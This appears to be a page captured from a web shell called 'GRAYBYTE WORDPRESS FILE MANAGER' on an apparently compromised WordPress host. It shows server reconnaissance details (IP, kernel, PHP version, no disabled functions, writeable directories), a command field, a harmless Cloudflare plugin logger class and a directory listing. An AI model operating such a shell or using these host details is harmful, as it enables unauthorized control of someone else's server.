GRAYBYTE WORDPRESS FILE MANAGER3851

Server IP : 68.65.123.43 / Your IP : 216.73.216.162
System : Linux server266.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/inteuuod/public_html/wp-content/plugins/cloudflare/src/Integration/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/inteuuod/public_html/wp-content/plugins/cloudflare/src/Integration//DefaultLogger.php
<?php

namespace CF\Integration;

use Psr\Log\AbstractLogger;
use Psr\Log\LogLevel;
use Psr\Log\LoggerInterface;

class DefaultLogger extends AbstractLogger implements LoggerInterface
{
    private $debug;

    const PREFIX = '[Cloudflare]';

    /**
     * @param bool|false $debug
     */
    public function __construct($debug = false)
    {
        $this->debug = $debug;
    }

    /**
     * Logs with an arbitrary level.
     *
     * @param mixed  $level
     * @param string $message
     * @param array  $context
     */
    public function log($level, $message, array $context = array())
    {
        return error_log(self::PREFIX.' '.strtoupper($level).': '.$message.' '.
            (!empty($context) ? print_r($context, true) : ''));
    }

    /**
     * Detailed debug information.
     *
     * @param string $message
     * @param array  $context
     */
    public function debug($message, array $context = array())
    {
        if ($this->debug) {
            return $this->log(LogLevel::DEBUG, $message, $context);
        }
    }
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:45:36
inteuuod / inteuuod
0755
.htaccess
0.41 KB
July 10 2025 04:32:23
inteuuod / inteuuod
0644
ConfigInterface.php
0.159 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644
DataStoreInterface.php
0.821 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644
DefaultConfig.php
0.547 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644
DefaultIntegration.php
1.973 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644
DefaultLogger.php
1.031 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644
IntegrationAPIInterface.php
1.079 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644
IntegrationInterface.php
0.354 KB
August 23 2024 03:21:02
inteuuod / inteuuod
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF